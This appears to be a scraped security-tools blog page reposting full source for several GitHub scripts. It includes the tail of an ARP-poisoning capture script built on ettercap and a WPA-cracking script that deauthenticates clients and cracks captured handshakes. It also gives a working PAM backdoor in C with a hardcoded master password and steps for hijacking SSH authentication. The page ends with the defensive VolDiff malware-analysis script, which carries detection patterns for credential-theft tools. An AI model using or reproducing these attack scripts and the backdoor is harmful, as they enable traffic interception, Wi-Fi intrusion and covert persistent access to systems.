  echo "Usage - ./incremental_poison.sh [interface] [# of concurrent hosts] [Unique_Scan_Name]"
  echo "Example - ./incremental_poison.sh eth1 4 BobsHardware_Scan1"
  echo ""
  echo "*****************************************************"
  echo "******************* -- WARNING -- *******************"
  echo "*****************************************************"
  echo "**                                                 **"
  echo "** Caution should be taken when using this script  **"
  echo "** As with any ARP Poisoning utility, significant  **"
  echo "** disruption can result from misuse...            **"
  echo "**                                                 **"
  echo "*****************************************************"
  echo ""
  echo "Author - Justin Hutchens - justinhutchens@gmail.com"
  echo ""
  exit
fi

## Launch awesome ASCII splash art
splash

## Cleanup Residual Temp Files
rm *.temp

## Initialize arguments passed into variables
iface=$1
hosts=$2
scanname=$3

## Create Scan Directory
mkdir $scanname

## Identify IP address, network prefix, and local /24 range
ip=$(ifconfig $iface | grep inet | grep -v "inet6" | cut -d ":" -f 2 | cut -d " " -f 1)
prefix=$(echo $ip | cut -d "." -f 1-3)
range="$prefix.0/24"

## Perform basic discovery scan on local /24 range to output to temp file
nmap -sn $range -oG results.temp

## Extract live IPs into another temp file
cat results.temp | grep "Up" | cut -d " " -f 2 > targets.temp

## Identify number of live IPs in range
lines=$(wc -l targets.temp | cut -d " " -f 1)
echo "[+] $lines total hosts identified in range..."

## Initialize incremental counters
x=2
i=1

## While-loop that extracts the subsequent group of addresses, and then launches poisoning in new terminal
while [ $x -lt $(($lines+5)) ]; do 
  group=$(sed -n $x,$(($x+$(($hosts-1))))p targets.temp | cut -d "." -f 4); 
  echo ""; 
  echo "[+] Starting Ettercap Capture $i..."; 
  gnome-terminal -x ettercap -M arp:remote /$prefix.1/ /$prefix.$(echo $group | sed 's/ /,/g')/ -T -i $iface -w $scanname/$scanname_output$i.pcap; 
  sleep 5;
  pid=$(ps aux | grep "ettercap -M" | grep -v "grep" | awk '{print $2}'); 
  while [ $pid ]; do 
    echo "...Still running"; 
    sleep 30; 
    pid=$(ps aux | grep "ettercap -M" | grep -v "grep" | awk '{print $2}'); 
  done; 
  echo "[+] Process killed"; 
  echo "[+] Starting next capture..."; 
  echo "";
  x=$((x+$hosts)); 
  i=$((i+1)); 
done

## Cleanup Temp Files
rm *.temp

 

Download : Master.zip  | Clone Url
Source : https://github.com/hack1thu7ch

WPA Attack – Extremly simple script that can be used to crack WPA network password.

May 20, 2015, 7:51 pm
$
0
0

WPA Attack is a Extremly simple script that can be used to crack WPA network password.
How it works, It runs 3 separated konsole processes:
– aircrack-ng which is used to crack passphrase using .cap files
– airodump-ng which is used to capture packets from Access Point along with **
– aireplay-ng (option -0) which is used to disconnect connected clients, so you can capture WPA Handshake when client tries to reconnect
To be able to crack WPA/WPA2 passphrase you’ll need to capture Four-Way Handshake first. This information should pop up in your airodump-ng console window.

Example screenshot WPA-Attack

Example screenshot WPA-Attack

Requirements:
– Wireless adapter which supports injection (see [https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers Reaver Wiki])
– Linux Backtrack 5
– Root access on your system (otherwise some things may not work)
– AND if you use other Linux distribution
— Reaver 1.4 (I didn’t try it with previous versions)
— KDE (unless you’ll change ‘konsole’ invocations to ‘screen’, ‘gnome-terminal’ or something like that… this is easy)
— Gawk (Gnu AWK)
— Macchanger
— Airmon-ng, Airodump-ng, Aireplay-ng
— Perl

Additional Info, Before you use this script make sure that your script has permissions to execute.
If not type:

WPA-Attack Script:

#!/bin/bash

# TODO: 
# - write PIN + key to file with Perl after PIN recovery

WIRELESS_INTERFACE="wlan0";

################# FUNCTIONS ##############
getKonsolePidByProcessName(){
    ps aux | grep konsole | grep "$1" | awk -F" " '{print $2}'
}

# echo blue text
echoBlue(){
   echo "$(tput setaf 6)>>>>>> ${1}$(tput sgr0)";
}

# echo green text
echoGreen(){
   echo "$(tput setaf 2)>>>>>> ${1}$(tput sgr0)";
}

getWifiCardDriver(){
    lshw -c network | gawk '!/wireless/ || !/driver/{ next; } { while(++i<=NF){ if($i ~ /driver\=/){ sub("driver=","",$i); print $i; } } }';
}

# tries to extract monitor name from the ifconfig output
getMonitorName(){
    ifconfig | perl -lane '{ if(/^[^\s]*mon/){ $_ =~ s/\s+.*//; print $_; } }'
}

resetWifiCard(){
  local WIFI_DRIVER=$(getWifiCardDriver);
  local RESET_CARD_DRIVER_CMD="";
  if [[ -z "$WIFI_DRIVER" ]]; then
	echoBlue "Sorry couldn't get your WifiDriver";
	echoBlue "Check if any wifi card is connected and try again";
	echoBlue "You may try to reconnect your wifi card to USB port, and try again.";
	echoBlue "If above solutions doesn't work, you have to check getWifiCardDriver() function on your own...";
	exit;
  else 
	echoBlue "I found that your WIFI driver is $WIFI_DRIVER ";
	echoBlue "Resetting WIFI card ";
	echoGreen "modprobe -r $WIFI_DRIVER && modprobe $WIFI_DRIVER";
	modprobe -r $WIFI_DRIVER && modprobe $WIFI_DRIVER;
  fi
}

stopMonitor() {
	  echoGreen "killall airodump-ng" && killall airodump-ng &>/dev/null;
	  echoGreen "killall aireplay-ng" && killall aireplay-ng &>/dev/null;
	  if [[ ! -z "$MONITOR_NAME" ]]; then
	      echoGreen "airmon-ng stop $MONITOR_NAME" && airmon-ng stop $MONITOR_NAME;
	      echoGreen "airmon-ng stop $WIRELESS_INTERFACE" && airmon-ng stop $WIRELESS_INTERFACE;
	      echoGreen "airmon-ng check" && airmon-ng check;
	  fi
}

startMonitor(){
      echoGreen "airmon-ng start $WIRELESS_INTERFACE" && airmon-ng start $WIRELESS_INTERFACE
}

restartMonitor() {
      stopMonitor;
      startMonitor;
}

changeMacTo(){
      echoBlue "ifconfig $MONITOR_NAME down" && ifconfig $MONITOR_NAME down;
      echoBlue "macchanger -m $1 $MONITOR_NAME" && macchanger -m $1 $MONITOR_NAME;
      echoBlue "ifconfig $MONITOR_NAME up" && ifconfig $MONITOR_NAME up;
}
getRandomMac(){
      echo $(perl -e 'sub l{":".int(rand(9)).int(rand(9));}; print "02".l.l.l.l.l;');
}

################# FUNCTIONS END ##########


############# PARSING OPTIONS #####################
BSSID="";
CHANNEL="";
WORDLIST_FILE="./someDictionary.txt";
SPOOFED_MAC="";
HANDSHAKE_GRAB=0

while getopts "c:b:w:s:h" opt; do
    case "$opt" in
    b)  BSSID=$OPTARG
        ;;
    c)  CHANNEL=$OPTARG
        ;;
    w)  WORDLIST_FILE=$OPTARG
        ;;
    s)  SPOOFED_MAC=$OPTARG
        ;;
    h)  HANDSHAKE_GRAB=1
        ;;
    esac
done

if [[ -z "$BSSID" || -z "$CHANNEL" ]]; then
  echo "Using: $0 [OPTIONS]";
  echo "[OPTIONS]:";
  echo "   -b [BSSID] - you must give bssid of target access point";
  echo "   -c [CHANNEL] - you must give channel of target access point";
  echo "   -w [WORDLIST_FILE_PATH] - path to file containing dictionary";
  echo "   -s [SPOOFED_MAC] - if you want to spoof (change) mac address of your wifi card (safety)";
  echo "   -h only grab handshake for [BSSID] and exit (don't proceed with aircrack)";
  exit;
fi

# not just handshake grab && no wordlist file
if [ $HANDSHAKE_GRAB == 0 ] && [ ! -f "$WORDLIST_FILE" ]; then
    echoBlue "Wordlist file '$WORDLIST_FILE' doesn't exist, please specify valid file";
    exit;
fi

############# PARSING OPTIONS END  ###############
# try to get monitor name if it's already set ?
MONITOR_NAME=$(getMonitorName);
stopMonitor;
resetWifiCard;
startMonitor;

############################### SETUP VARS ####################

CURRENT_DIR=$(pwd);
#capitalize BSSID (in case user gives small letters)
BSSID=$(perl -e 'print uc($ARGV[0]);' "${BSSID}");
BSSID_CLEAR=$(echo $BSSID | sed s/://g);
AIRODUMP_LOG_DIR="${CURRENT_DIR}/airodump_logs";
BSSID_LOG="${AIRODUMP_LOG_DIR}/${BSSID_CLEAR}.log";
CAP_FILE_1="${BSSID_LOG}-01.cap";
CAP_FILE_WILDARD="${BSSID_LOG}-*.cap";
TMP_CONNECTED_CLIENTS="/tmp/WPA-Attack-connected-clients_${BSSID_CLEAR}";
TMP_WPA_HANDSHAKE_GRABBED="/tmp/WPA-Attack-handshake-grabbed_${BSSID_CLEAR}";
NETWORK_CLIENT_MAC="";
# Crack password using password file list
KEY_FOUND_LOG="${CURRENT_DIR}/KEY_FOUND_${BSSID_CLEAR}";
## use random mac (for safety)
RANDOM_MAC=$(getRandomMac);
MONITOR_NAME=$(getMonitorName);

if [[ -z $(ifconfig | grep "$MONITOR_NAME") ]]; then
  echoBlue "Something is wrong, can't start monitor mode for wlan0";
  exit;
fi


if [[ -z "$MONITOR_NAME" ]]; then
   echoBlue "Couldn't find monitor name from your ifconfig output! Can your wifi card work in monitor mode?";
   echoBlue "Setup variable MONITOR_NAME to store proper name like: mon0, wlan0mon... etc.";
   exit;
fi

##############################################################


# spoofed mac ?
if [[ ! -z "$SPOOFED_MAC" ]]; then
   changeMacTo "$SPOOFED_MAC"
else 
   changeMacTo "$RANDOM_MAC";
fi

if [[ ! -d $AIRODUMP_LOG_DIR ]]; then
    mkdir -m 700 $AIRODUMP_LOG_DIR;
fi

# remove old logs for BSSID
rm "$CAP_FILE_WILDARD" 2>/dev/null;

if [[ -f $TMP_CONNECTED_CLIENTS ]]; then
    rm $TMP_CONNECTED_CLIENTS 2>/dev/null;
fi

if [[ -f $TMP_WPA_HANDSHAKE_GRABBED ]]; then
    rm $TMP_WPA_HANDSHAKE_GRABBED 2>/dev/null;
fi

####################### LOGGING PACKETS BY AIRODUMP-NG ###########################################

LOGGING_PACKETS='airodump-ng --showack --bssid='$BSSID' -c '$CHANNEL' -w '$BSSID_LOG' '$MONITOR_NAME' 2>&1 \
		| perl -e '\'' 
		    my @clientMacs="";
		    while(<>){
			# search connected client
			if(/'$BSSID'\s+([A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2})/){
			    # element is not in array
			     if( !($1 ~~ @clientMacs) ){
				push(@clientMacs,$1);
				open TMP_FILE, ">>'$TMP_CONNECTED_CLIENTS'";
				print TMP_FILE "$1\n";
				close TMP_FILE;
			      }
			}
			# if we find WPA-Hanshake we can kill the process
			if(/WPA handshake:/){ 
			      print $_;
			      system("touch '$TMP_WPA_HANDSHAKE_GRABBED'");
			      system("killall -INT airodump-ng");
			      exit;
			}
			print $_;
		    }
		  '\''  ';
konsole -hold -e /bin/sh -c "$LOGGING_PACKETS" 2>/dev/null;
echoGreen "airodump-ng $MONITOR_NAME --bssid=$BSSID -c $CHANNEL -w $BSSID_LOG";


echoBlue "Waiting for clients and WPA-Handshake...";
IFS=$'\n';
while true; do
      if [[ -f $TMP_CONNECTED_CLIENTS ]]; then
	  NETWORK_CLIENTS_MAC=$(cat $TMP_CONNECTED_CLIENTS);
	  for SINGLE_CLIENT in $NETWORK_CLIENTS_MAC; do 
		# Deauthenticate single wireless client (force him to another connection and grab WPA Hanshake)
		DEAUTH_CMD="aireplay-ng -0 10 -a $BSSID -c $SINGLE_CLIENT $MONITOR_NAME";
		echoBlue "Trying to deauthenticate connected client: $SINGLE_CLIENT ...";
		echoGreen "$DEAUTH_CMD";
		konsole -e /bin/sh -c "$DEAUTH_CMD" 2>/dev/null
		sleep 15;
		if [[ -f $TMP_WPA_HANDSHAKE_GRABBED ]]; then
		    echoBlue "WPA Handshake from BSSID $BSSID was grabbed!!!";
		    rm $TMP_WPA_HANDSHAKE_GRABBED;
		    break 2;
		fi
	  done
	  #echo $DEAUTH_CMD;
      fi  
      sleep 30;
done

# if only grabbing handshake - exit after that
if [[ $HANDSHAKE_GRAB == 1 ]]; then
    echoBlue "Handshake was logged to: ${CAP_FILE_1}";
    echoBlue "You can use following command to crack it:";
    echoBlue "aircrack-ng -l ${CURRENT_DIR}/KEY_FOUND_${BSSID_CLEAR} -w ${WORDLIST_FILE} -b ${BSSID} ${CAP_FILE_WILDARD}";
    echoBlue "You used -h option (exit after handshake grab)";
    exit;
fi

################## CRACKING .cap file using wordlist file ############################################



# example command:
#   aircrack-ng -l KEY_FOUND -w ./wordlistExample.txt -b 00:02:72:55:FF:C0 ./airodump_logs/00027255FFC0*.cap
AIRCRACK_CMD="aircrack-ng -l ${KEY_FOUND_LOG} -w ${WORDLIST_FILE} -b ${BSSID} ${CAP_FILE_WILDARD}";
konsole -hold -e /bin/sh -c "${AIRCRACK_CMD}" 2>/dev/null;
echoGreen $AIRCRACK_CMD;

echoBlue "Aircrack will write results to ${KEY_FOUND_LOG}...";
# periodical checking if KEY_FOUND file exists
while true; do
  if [[ -f $KEY_FOUND_LOG ]]; then
      kill -INT $(getKonsolePidByProcessName aireplay-ng)
      killall -INT aireplay-ng
      echoBlue "!!!! KEY WAS FOUND !!!!"
      echoBlue "---------- YOUR WPA KEY IS: ----------------"
      echoBlue $(cat $KEY_FOUND_LOG)
      echoBlue "--------------------------------------------"
      echoBlue "You have it also in file: $KEY_FOUND_LOG"
      exit;
  fi
  sleep 30;
done

Pyrit-Attack Script:

#!/bin/bash

# pyrit -r ./WPA-Attack/airodump_logs/LOOG.log-01.cap analyze
# analyze if there is handshake in a .cap file, it is better than aircrack
# @param .cap file
pyritAnalyzeLog(){
      pyrit -r $1 analyze
}
# pyrit --all-handshakes -r ./WPA-Attack/airodump_logs/LOOG.log-01.cap -i ./WPA-Attack/wordlistExample.txt attack_passthrough
# attacks using .cap file and wordlist file
pyritAttack(){
      pyrit --all-handshakes -b $1 -r $2 -i $3 attack_passthrough
}

if [[ -z "$1" || -z "$2" || -z "$3" ]]; then
  echo "Using: $0 [BSSID] [.cap FILE_PATH] [WORDLIST_FILE_PATH]";
  echo "Example:";
  echo "$0 00:11:22:33:44:55 ./airodump_logs/001122334455.log-01.cap ./wordlistExample.txt";
  exit;
fi

pyritAnalyzeLog $2;
pyritAttack $1 $2 $3;

 

Download: Master.zip | Clone Url
Source: https://github.com/DominikStyp

pambd – small and fast solution to create a undetectable backdoor through the PAM module.

May 21, 2015, 5:37 pm
$
0
0

This trick shows you how to create a PAM module backdoor that allows to execute an user login with your own custom password.

If you try to make the login with the real password of the target user and the authentication fails, the pam_auth.so switches to the pambd.so and viceversa.

Generate the backdoor:
If you get the error:

pambd.c:13:31: fatal error: security/pam_appl.h: No such file or directory

First install the package libpam-dev that contains the needed headers file for compilation:

deftcode pambd $ sudo apt-get install libpam0g-dev

Now edit the pambd.c and set your master custom password:

#define MYPASSWD "my_master_passwd"

After that, generate the pam backdoor with: (It needs the root permissions)

deftcode pambd $ sudo sh gen.sh

::Configure the PAM service you want to hijack::
Edit the /etc/pam.d/sshd or other that use PAM like /etc/pam.d/su and then replace the content with these lines:

nauth           sufficient      pam_rootok.so
auth            sufficient      pam_unix.so     # This must be 'sufficient'.
account         required        pam_unix.so
session         required        pam_unix.so
auth            sufficient      pambd.so        # This is our pam backdoor.
account         sufficient      pambd.so        # --

::Test the backdoor::
After you have created the pambd backdoor, you can test It.

deftcode pambd $ file /lib/security/pambd.so 
/lib/security/pambd.so: ELF 64-bit LSB  shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped

gen.sh – generate the pam backdoor.Script:

#!/bin/bash
# gen.sh - generate the pam backdoor.

BIN_GCC='/usr/bin/gcc'
BIN_LD='/usr/bin/ld'
BIN_RM='/bin/rm'

CFLAGS='-fPIC'
LDFLAGS='-x --shared'

if [ "$(id -u)" != '0' ]; then
    echo 'This script must be run as root!' 1>&2
    exit 1
fi

${BIN_GCC} ${CFLAGS} -c pambd.c
${BIN_LD} ${LDFLAGS} -o /lib/security/pam_bd.so pambd.o
${BIN_RM} pambd.o

pambd.c – A small pam backdoor. Script:

/**
 * pambd.c - A small pam backdoor.
 * Federico Fazzi <eurialo@deftcode.ninja>
 * 
 * This trick shows you how to create a PAM module backdoor that 
 * allows to execute an user login with your own custom password.
 *
 * If you try to make the login with the real password of the target 
 * user and the authentication fails, the pam_auth.so switches to the 
 * pambd.so and viceversa!
 *
 * (c) 2015 - MIT License.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <security/pam_appl.h>
#include <security/pam_modules.h>

#define MYPASSWD "my_master_passwd"

PAM_EXTERN int pam_sm_setcred
(pam_handle_t *pamh, int flags, int argc, const char **argv) {
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_acct_mgmt
(pam_handle_t *pamh, int flags, int argc, const char **argv) {
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_authenticate
(pam_handle_t *pamh, int flags,int argc, const char **argv) {
    char *password = NULL;

    pam_get_authtok(pamh, PAM_AUTHTOK, (const char **)&password, NULL);

    if (!strncmp(password, MYPASSWD, strlen(MYPASSWD)))
        return PAM_SUCCESS;

    return -1;
}

 

Download : Master.zip  | Clone Url
Source : https://github.com/eurialo

Search

Updates VolDiff – Malware Memory Footprint Analysis.

May 26, 2015, 2:15 pm
$
0
0

Latest Version v-1.2:
+ Added checks to search for executables/DLLs loaded from TEMP folders
+ Added checks to search for keylogger artifacts
+ Added a check to dump and analyse the hosts file
+ Added a routine to compute a list of unique IPs from netscan output
+ Minor bug fixes and enhancements

VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution. It creates a report that highlights system changes.

VolDiff is a simple yet powerfull malware analysis tool that enables malware analysts to quickly identify IOCs and understand advanced malware behaviour.

Use Directions:
1.Capture a memory dump of a clean Windows system and save it as “baseline.raw”. This image will serve as a baseline for the analysis.
2.Execute your malware sample on the same system, then take a second memory dump and save it as “infected.raw”.
3.Run VolDiff:

./VolDiff.sh path/to/baseline.raw path/to/infected.raw profile
"profile" should be "Win7SP0x86" or "Win7SP1x64" etc.

VolDiff will save the output of a selection of Volatility plugins for both memory images (baseline and infected), then it will create a report to highlight notable changes (new processes, network connections, injected code, drivers etc).

Example Output :

Volatility analysis report generated by VolDiff.
Download the latest VolDiff version from https://github.com/aim4r/VolDiff/.

Suspicious new connections (netscan)
=========================================================================

Proto    Local Address                  Foreign Address      State            Pid      Owner 
TCPv4    172.16.108.128:139             0.0.0.0:0            LISTENING        4        System 
TCPv4    172.16.108.128:49167           62.24.131.168:80     CLOSED           924      svchost.exe 
TCPv4    172.16.108.128:49164           65.55.50.157:443     CLOSED           924      svchost.exe 
TCPv4    172.16.108.128:49165           62.24.131.168:80     CLOSED           924      svchost.exe 
TCPv4    172.16.108.128:49168           87.236.215.151:80    CLOSED           2108     explorer.exe

Suspicious new processes (psscan)
=========================================================================

Offset(P)          Name                PID   PPID PDB        Time created                    
------------------ ---------------- ------ ------ ---------- ------------------------------ 
0x000000003fc7f030 kmaxqsj.exe        2300   4044 0x3ebed520 2015-05-02 19:33:07 UTC+0000  
0x000000003fc8ed40 malwr.exe          2908   4020 0x3ebed540 2015-05-02 19:32:45 UTC+0000  

Potential process injection (malfind)
=========================================================================

Process: kmaxqsj.exe Pid: 2300 Address: 0x400000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 165, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x00400000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
0x00400010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
0x00400020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00400030  00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00   ................

0x400000 4d               DEC EBP
0x400001 5a               POP EDX
0x400002 90               NOP
0x400003 0003             ADD [EBX], AL
0x400005 0000             ADD [EAX], AL
0x400007 000400           ADD [EAX+EAX], AL
0x40000a 0000             ADD [EAX], AL
0x40000c ff               DB 0xff

Suspicious driver modules
===========================================================================

Module                               Driver
------------------------------------ ------
UNKNOWN                              \Driver\storage
UNKNOWN                              \Driver\PGPsdkDriver
UNKNOWN                              \Driver\cipher
UNKNOWN                              \Driver\fileflt
UNKNOWN                              \Driver\TdiFlt2
UNKNOWN                              \Driver\TdiFlt
UNKNOWN                              \Driver\stopsec

Suspicious callbacks
===========================================================================

Type                                 Callback   Module   
------------------------------------ ---------- --------
IoRegisterFsRegistrationChange       0x8549dd08 UNKNOWN  
GenericKernelCallback                0x854a0c88 UNKNOWN  
GenericKernelCallback                0x854964ec UNKNOWN 
GenericKernelCallback                0x854a0d88 UNKNOWN 
GenericKernelCallback                0x854961fa UNKNOWN 
IoRegisterShutdownNotification       0x854a28ca UNKNOWN

Script :

#!/bin/bash
# VolDiff malware analysis script by @aim4r

version="1.2.0"

################################ PRINT VOLDIFF BANNER ################################
echo -e " _    __      ______  _ ________"
echo -e "| |  / /___  / / __ \(_) __/ __/"
echo -e "| | / / __ \/ / / / / / /_/ /_  "
echo -e "| |/ / /_/ / / /_/ / / __/ __/  "
echo -e "|___/\____/_/_____/_/_/ /_/     "

echo -e "\nVolDiff: Malware Memory Footprint Analysis (v$version)"

################################ HELP ################################
if [[ $@ =~ "--help" ]] ; then
  echo -e "\nUsage: ./VolDiff.sh [BASELINE_IMAGE] INFECTED_IMAGE PROFILE [OPTIONS]"
  echo -e "\nUse directions:"
  echo -e "1. Capture a memory dump of a clean Windows system and save it as \"baseline.raw\". This image will serve as a baseline for the analysis."
  echo -e "2. Execute your malware sample on the same system, then capture a second memory dump and save it as \"infected.raw\"."
  echo -e "3. Run VolDiff as follows: \"./VolDiff.sh baseline.raw infected.raw <profile>\" where <profile> is Win7SP0x86 or Win7SP1x64 etc."
  echo -e "VolDiff will save the output of a selection of volatility plugins for both memory images (baseline and infected), then it will create a report to highlight notable changes (new processes, network connections, injected code, suspicious drivers etc)."
  echo -e "\nVolDiff can also be used to analyse a single memory image."
  echo -e "\nOptions:"
  echo -e "--help            display this help and exit"
  echo -e "--version         display version information and exit"
  echo -e "--dependencies    display information about script dependencies and exit"
  echo -e "--malware-checks  hunt and report suspicious anomalies (slow, recommended)"
  echo -e "--no-report       do not create a report"
  echo -e "\nTested using Volatility 2.4 (vol.py) on Windows 7 images."
  echo -e "Report bugs to houcem.hachicha[@]gmail.com"
  exit
fi

################################ VERSION INFORMATION ################################
if [[ $@ =~ "--version" ]] ; then
  echo -e "This is free software: you are free to change and redistribute it."
  echo -e "There is NO WARRANTY, to the extent permitted by law."
  echo -e "Written by @aim4r. Report bugs to houcem.hachicha[@]gmail.com."
  exit
fi

################################ DEPENDENCIES ################################
if [[ $@ =~ "--dependencies" ]] ; then
  echo -e "Requires volatility 2.4 (vol.py) to be installed."
  exit
fi

################################ DECLARING LIST OF VOLATILITY PLUGINS TO PROCESS ################################
# volatility plugins to run:
declare -a plugins_to_run=("handles" "psxview" "netscan" "iehistory" "getsids" "pslist" "psscan" "cmdline" "consoles" "dlllist" "filescan" "shimcache" "shelbags" "sessions" "messagehooks" "eventhooks" "svcscan" "envars" "mutantscan" "symlinkscan" "atoms" "atomscan" "drivermodule" "mftparser" "driverscan" "devicetree" "modules" "modscan" "unloadedmodules" "callbacks" "ldrmodules" "privs" "hashdump" "orphanthreads" "malfind" "idt" "gdt" "driverirp" "deskscan" "timers" "gditimers" "ssdt")

# volatility plugins to report on (order matters!) / dual mode:
declare -a plugins_to_report=("pslist" "psscan" "psxview" "netscan" "iehistory" "malfind" "sessions" "privs" "messagehooks" "eventhooks" "envars" "shimcache" "shelbags" "cmdline" "consoles" "hashdump" "drivermodule" "driverscan" "driverirp" "modules" "modscan" "unloadedmodules" "devicetree" "callbacks" "orphanthreads" "mutantscan" "symlinkscan" "ssdt")

# volatility plugins to report on (order matters!) / standalone mode:
declare -a plugins_to_report_standalone=("netscan" "psscan" "psxview" "malfind" "cmdline" "consoles" "iehistory")

################################ HARDCODED REGEX EXPRESSIONS ################################
hacker_process_regex="at.exe|chtask.exe|clearev|ftp.exe|net.exe|nbtstat.exe|net1.exe|ping.exe|powershell|procdump.exe|psexec|quser.exe|reg.exe|regsvr32.exe|schtasks|systeminfo.exe|taskkill.exe|timestomp|winrm|wmic|xcopy.exe"
hacker_dll_regex="mimilib.dll|sekurlsa.dll|wceaux.dll|iamdll.dll"

# suspicious process names
l33t_process_name="snss|crss|cssrs|csrsss|lass|isass|lssass|lsasss|scvh|svch0st|svhos|svchst|svchosts|lsn|g0n|l0g|nvcpl|rundii|wauclt|spscv|spppsvc|sppscv|sppcsv|taskchost|tskhost|msorsv|corsw|arch1ndex|wmipvr|wmiprse|runddl"

# usual process list
usual_processes="sppsvc.exe|audiodg.exe|mscorsvw.exe|SearchIndexer|TPAutoConnSvc|TPAutoConnect|taskhost.exe|smss.exe|crss.exe|wininit.exe|services.exe|lsass.exe|svchost.exe|lsm.exe|explorer.exe|winlogon|conhost.exe|dllhost.exe|spoolsv.exe|vmtoolsd.exe|WmiPrvSE.exe"

# regexes used to analyse imports
password_extract_imports="SamLookupDomainInSamServer|NlpGetPrimaryCredential|LsaEnumerateLogonSessions|SamOpenDomain|SamOpenUser|SamGetPrivateData|SamConnect|SamRidToSid|PowerCreateRequest|SeDebugPrivilege|SystemFunction006|SystemFunction040"
process_injection_imports="VirtualAllocEx|AllocateVirtualMemory|VirtualProtectEx|ProtectVirtualMemory|CreateProcess|LoadLibrary|LdrLoadDll|CreateToolhelp32Snapshot|QuerySystemInformation|EnumProcesses|WriteProcessMemory|WriteVirtualMemory|CreateRemoteThread|ResumeThread|SetThreadContext|SetContextThread|QueueUserAPC|QueueApcThread|WinExec"
web_imports="DeleteUrlCacheEntry|CreateUrlCacheEntry|HttpSendRequestA|HttpSendRequestW|HttpSendRequestExA|HttpSendRequestExW|URLDownloadToFileA|WSASocket|WSASend|WSARecv|WS2_32"
service_imports="CreateService|StartService|NdrClientCall2|NtLoadDriver"
uac_bypass_imports="AllocateAndInitializeSid|EqualSid|RtlQueryElevationFlags|GetTokenInformation|GetSidSubAuthority|GetSidSubAuthorityCount"
anti_debug_imports="CheckRemoteDebugger|DebugActiveProcess|FindWindow|GetLastError|GetWindowThreadProcessId|IsDebugged|IsDebuggerPresent|NtCreateThreadEx|NtGlobalFlags|NtSetInformationThread|OutputDebugString|pbIsPresent|Process32First|Process32Next|TerminateProcess|ThreadHideFromDebugger|UnhandledExceptionFilter|ZwQueryInformation"
misc_imports="CreateFile|NtSetSystemInformation|NtQuerySystemInformation|GetCurrentProcess|GetStartupInfo|GlobalAddAtomA|Sleep|RegOpenKeyEx|RegQueryValueEx|GetModuleFileName|WriteFile"

# regexes used to analyse strings (from process executables)
web_regex_str="cookie|download|mozilla|post|proxy|responsetext|socket|useragent|user-agent|urlmon|user_agent|WebClient|winhttp|http"
antivirus_regex_str="antivir|avast|avcons|avgctrl|avginternet|avira|bitdefender|checkpoint|comodo|F-Secure|firewall|kaspersky|mcafee|norton|norman|safeweb|sophos|symantec|windefend"
virtualisation_regex_str="000569|001C14|080027|citrix|parallels|proxmox|qemu|SbieDll|Vbox|VMXh|virm|virtualbox|virtualpc|vmsrvc|vpc|winice|vmware|xen"
sandbox_regex_str="anubis|capturebat|cuckoo|deepfreeze|debug|fiddler|fireeye|noriben|perl|python|sandb|schmidti|snort|tcpdump|wireshark"
sysinternals_regex_str="filemon|sysinternal|procmon|psexec|regmon|sysmon"
shell_regex_str="shellexecute|shell32"
keylogger_regex_str="backspace|klog|keylog|shift"
filepath_regex_str='C:\\(?:[^\\/:*?"<>|\r\n]+\\)*[^\\/:*?"<>|\r\n]*'
password_regex_str="brute|credential|creds|mimikatz|passwd|password|pwd|sniff|stdapi|WCEServicePipe|wce_krbtkts"
powershell_regex_str="powerview|powershell"
infogathering_regex_str="gethost|wmic|GetVolumeInformation"
banking_regex_str="banc|banco|bank|Barclays|hsbc|jpmorgan|lloyds|natwest|paypal|santander"
socialsites_regex_str="facebook|instagram|linkedin|twitter|yahoo|youtube"
exec_regex_str="\.bat|\.cmd|\.class|\.exe|\.jar|\.js|\.jse|\.SCR|\.VBE|\.vbs"
crypto_regex_str="bitlocker|crypt|truecrypt|veracrypt"
other_regex_str="admin|backdoor|botnet|chrome|clearev|currentversion|firefox|hosts|login|malware|netsh|registry|rootkit|sleep|smtp|timestomp|torrent|Trojan|UserInit"

################################ RUNNING MODE ################################
if [[ -f $2 ]] ; then
  mode="dual"
else
  mode="standalone"
fi

################################################################## ENTER DUAL MODE ################################################################## 

################################ SETTING PROFILE AND FINDING PATH TO MEMORY IMAGES ################################
if [[ $mode = "dual" ]] ; then 
  if [[ -f $1 ]] ; then
    baseline_memory_image=$1
    echo -e "Path to baseline memory image: $baseline_memory_image..."
  elif [[ -f baseline.raw ]] ; then
    baseline_memory_image=baseline.raw
    echo -e "Path to baseline memory image is not valid or was not specified. Using default ($baseline_memory_image)..."
  elif [[ -f baseline.vmem ]] ; then
    baseline_memory_image=baseline.vmem
    echo -e "Path to baseline memory image is not valid or was not specified. Using default ($baseline_memory_image)..."
  else
    echo -e "Please specify a path to a baseline memory image."
    exit
  fi

  if [[ -f $2 ]]; then
    infected_memory_image=$2
    echo -e "Path to infected memory image: $infected_memory_image..."
  elif [[ -f infected.raw ]] ; then
    infected_memory_image=infected.raw
    echo -e "Path to infected memory image is not valid or was not specified. Using default ($infected_memory_image)..."
  elif [[ -f infected.vmem ]] ; then
    infected_memory_image=infected.vmem
    echo -e "Path to infected memory image is not valid or was not specified. Using default ($infected_memory_image)..."
  else
    echo -e "Please specify a path to a memory image of an infected system."
    exit
  fi

  if [[ -z $3 ]] ; then
    profile=Win7SP0x86
    echo -e "Profile is not specified. Using default ($profile)..."
  elif [[ $3 != Win7SP1x64 ]] &&  [[ $3 != Win7SP0x86 ]] &&  [[ $3 != Win7SP0x64 ]] &&  [[ $3 != Win7SP1x86 ]] ; then
    profile=$3
    echo -e "WARNING: This script was only tested using Windows 7 profiles. The specified profile ($profile) seems different!" 
  else
    profile=$3
    echo -e "Profile: $profile..."
  fi

  ################################ CREATING FOLDER TO STORE OUTPUT ################################
  starttime=$(date +%s)
  output_dir=VolDiff_$(date +%F_%R)
  mkdir $output_dir
  mkdir $output_dir/tmpfolder

